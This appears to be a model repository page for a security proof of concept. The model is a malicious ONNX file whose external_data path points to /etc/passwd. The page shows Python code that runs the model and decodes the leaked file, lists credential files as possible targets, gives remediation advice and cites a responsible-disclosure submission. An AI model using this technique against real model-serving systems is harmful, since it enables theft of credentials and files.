You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

ONNX Arbitrary File Read PoC

⚠️ WARNING: Malicious Model - For Security Research Only

This model demonstrates a critical vulnerability: Arbitrary File Read via External Data Path Traversal.

Vulnerability Description

The ONNX runtime does not validate the location field in TensorProto.external_data, allowing malicious models to read arbitrary files from the server's filesystem.

How It Works

The model's tensor has external_data.location set to /etc/passwd (absolute path)
When loaded via onnxruntime.InferenceSession(), the runtime reads this file
File content is loaded into the tensor data
Inference output contains the sensitive file content

Reproduction

import onnxruntime as ort
import numpy as np

# Load malicious model
sess = ort.InferenceSession("file_read_poc.onnx")

# Run inference (no input needed)
outputs = sess.run(None, {})

# Decode file content
file_data = bytes(outputs[0].tolist())
print(file_data.decode('utf-8', errors='ignore'))
# Output: root:x:0:0:root:/root:/bin/bash...

Impact

Severity: Critical
Attack Vector: Model-as-a-Service (MaaS) platforms
Affected: Any system running user-uploaded ONNX models
Consequences:
- Credential theft (~/.aws/credentials, SSH keys)
- Source code leakage
- Configuration file exposure
- System information disclosure

Remediation

Validate external_data.location to ensure it's relative and within model directory
Reject absolute paths
Implement path sandboxing
Add --allow-external-data flag (disabled by default)

Responsible Disclosure

This PoC is submitted through Huntr's responsible disclosure program.

Category: MFV (Model File Vulnerability)
Status: Under Review
Reporter: Security Researcher

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support